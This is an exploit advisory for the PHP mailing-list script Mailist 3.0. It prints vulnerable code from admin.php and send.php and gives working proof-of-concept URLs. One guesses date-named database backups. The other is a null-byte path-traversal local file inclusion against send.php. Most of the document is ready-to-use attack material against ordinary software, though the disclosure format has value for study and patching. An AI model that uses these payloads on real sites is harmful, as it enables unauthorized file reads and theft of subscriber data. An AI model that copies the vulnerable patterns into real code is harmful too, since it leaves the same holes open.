#############################################################################################
[+] Mailist 3.0 Insecure Backup/Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
[+] www.anti-intruders.org
#############################################################################################

[+] Homepage : http://ninjadesigns.co.uk/

[+] Download : http://ninjadesigns.co.uk/enter/mailist.zip


[+] Insecure Backup

 - Vulnerable code in admin.php


---------------------------------------------------------------------


if (isset($_GET['backup'])){
  echo "<br>";
  $file = 'maillist.php';
  $newfile = 'backups/'.date("jnY").'.txt';
  copy($file, $newfile);
  echo 'Successfully backed up. (backups/'.$newfile.')<br>';
  echo '<a href="'.$_SERVER['PHP_SELF'].'">Hide</a><br>';
}


----------------------------------------------------------------------

 We can see how its crated a backup : $newfile = 'backups/'.date("jnY").'.txt';
 The date() function is used.

    n -  Numeric representation of a month, without leading zeros
    j -  Day of the month without leading zeros
    Y -  A full numeric representation of a year, 4 digits

 So we can guess the database backup if we know when was created.

   Example : 622009.txt

        6 - the day without leading 0
        2 - the month without leading 0
        2009 - the year

   PoC :  http://127.0.0.1/path/backups/622009.txt



[+] Local File Inclusion


 - Vulnerable code in send.php :

---------------------------------------------------------------------

if(isset($load)){

include("outbox/".$load.".txt");
}


---------------------------------------------------------------------

 Example :

   http://127.0.0.1/path/send.php?load=[Local File]%00

 PoC :

    http://127.0.0.1/path/send.php?load=../../../../boot.ini%00



#############################################################################################